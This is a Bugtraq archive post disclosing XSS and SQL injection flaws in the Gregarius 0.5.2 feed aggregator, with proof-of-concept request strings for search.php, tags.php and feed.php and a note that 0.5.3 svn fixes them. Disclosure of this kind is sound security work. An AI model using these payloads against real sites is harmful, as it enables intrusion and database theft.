Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities

From: tzitaroth () gmail com
Date: 3 Mar 2006 13:29:55 -0000
http://gregarius.net/
Gregarius is a web-based RSS/RDF/ATOM feed aggregator, designed to run on your web server, allowing you to access your 
news sources from wherever you want. 

XSS in search.php:
search.php?rss_query=<script>alert(1)</script>&rss_query_match=exact

XSS in tags.php:
tags.php?tag=<script>alert(1)</script>

SQL Injection in feed.php:
feed.php?folder=3 and 1=1 UNION select title from item--

with magic_quotes=off:
SQL Injection in search.php:
search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null from item-- 
&rss_query_match=exact


On Gregarius 0.5.2/PostrgreSQL this could lead to damaging/altering the DB and possible local file disclosure due to 
not properly sanitized $lang include, on early 0.5.3 svn version to admin hash disclosure.
More XSS and SQL Injections in admin section.

Fixed in latest 0.5.3 svn.
Previous By Date Next
Previous By Thread Next

Current thread: